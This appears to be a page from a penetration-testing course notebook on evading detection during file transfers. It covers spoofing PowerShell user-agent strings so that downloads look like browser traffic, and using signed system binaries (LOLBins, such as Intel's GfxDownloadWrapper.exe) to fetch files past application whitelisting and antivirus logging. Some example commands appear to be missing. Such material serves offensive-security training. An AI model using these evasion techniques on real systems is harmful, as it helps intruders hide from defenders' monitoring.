search

Evade Detection

hashtag
πŸ•΅οΈ Evading Detection – Blending in With the Crowd

Good attackers hide. Great ones blend in. If your transfer techniques are getting flagged, it’s time to get stealthy.

Let’s explore how to evade detection by:

  • πŸ› οΈ Modifying user agents

  • πŸ₯· Leveraging LOLBins and GTFOBins

  • πŸ€– Using trusted binaries to download files

hashtag
🦑 1. Changing User-Agent Strings

Many defenders watch for user-agents like curl/7.68.0, PowerShell/5.1.14393, or Microsoft BITS/7.8.

Luckily, PowerShell's Invoke-WebRequest supports custom User-Agent strings. 🎭

hashtag
πŸ§ͺ List Built-In PowerShell User Agents

[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl

You’ll see options like:

  • Chrome: Mozilla/5.0 ... Chrome/7.0.500.0

  • Firefox: Gecko/20100401 Firefox/4.0

  • Safari: AppleWebKit/533.16

hashtag
🧠 Use a Fake Chrome User-Agent

πŸ“‘ The server will log:

βœ… Much less suspicious than WindowsPowerShell/5.1.

hashtag
🧬 2. Living Off the Land – LOLBins & GTFOBins

When you're blocked from using PowerShell, Netcat, or external tools, turn to trusted system binaries β€” aka LOLBins πŸͺ€

These are binaries that:

  • βœ… Are pre-installed

  • βœ… Are signed by the vendor

  • βœ… Are trusted by application whitelisting solutions

hashtag
βš™οΈ Example: GfxDownloadWrapper.exe

A legitimate Intel binary that can download files from the web:

βœ… May bypass application whitelisting βœ… Could be excluded from AV logging or monitoring ❗ Found only on machines with Intel drivers

hashtag
πŸ”— Pro Resources

Tip: Use +file-download and +file-upload tags to discover binaries for your purpose.

PreviousDetectionNextShells & Payloads

Last updated